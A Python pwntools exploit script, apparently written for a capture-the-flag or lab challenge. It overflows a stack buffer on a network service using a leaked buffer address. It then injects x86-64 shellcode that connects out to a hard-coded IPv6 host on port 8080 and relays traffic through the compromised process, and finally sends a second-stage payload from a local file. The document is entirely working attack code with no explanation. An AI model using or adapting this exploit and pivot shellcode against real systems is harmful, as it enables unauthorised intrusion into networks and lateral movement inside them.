from pwn import *
context(arch='amd64', os='linux')

lvl3_host = 'localhost'
io = remote(lvl3_host, 8181)
io.sendline(b"A" * 0x60)
io.recvuntil(b"DEBUG: buf is at ")
buf_addr = int(io.recvline().decode().strip(), 16)
print(hex(buf_addr))

sc = '''
/* socket(0xa, 0x1, 0) */
mov eax, 41  /* socket */
mov rdi, 0xa
mov rsi, 0x1
xor rdx, rdx
syscall

/* prod */
mov r15, 0x0000000000000000
push r15
mov r15, 0xdec0defeff3e1602
push r15
mov r15, 0xaae9661fab9a0090
push r15
mov r15, 0x00000000901f000a
push r15

/* incus
mov r15, 0x0000000000000000
push r15
mov r15, 0xdac0defeff3e1602
push r15
mov r15, 0xaae9661fab9a0090
push r15
mov r15, 0x00000000901f000a
push r15
*/

mov rsi, rsp
mov rdx, 28
mov rax, 42
mov rdi, 6
syscall

sub rsp, 1024
/* read(5, rsp, 1024) */
rloop:
xor rax, rax
mov rdi, 5
mov rsi, rsp
mov rdx, 0x400
syscall
cmp rax, 0
jl rloop
/* write(6, rsp, rax) */
mov rdx, rax
mov rax, 1
mov rdi, 6
syscall

/* read(6, rsp, 32) */
mov rax, 0
mov rdi, 6
mov rsi, rsp
mov rdx, 32
syscall
mov r15, rax
/* write(5, rsp, rax) */
mov rdx, rax
mov rax, 1
mov rdi, 5
mov rsi, rsp
syscall
test r15, r15
jne rloop
'''

print(sc)
sc = asm(sc)

p1 = sc + b'\x90' * (280 - len(sc)) + p64(buf_addr)
io.sendline(p1)
# pause()
io.recvline()

with open('pl_internal', 'rb') as fd:
    pint = fd.read()

io.sendline(pint)
io.interactive()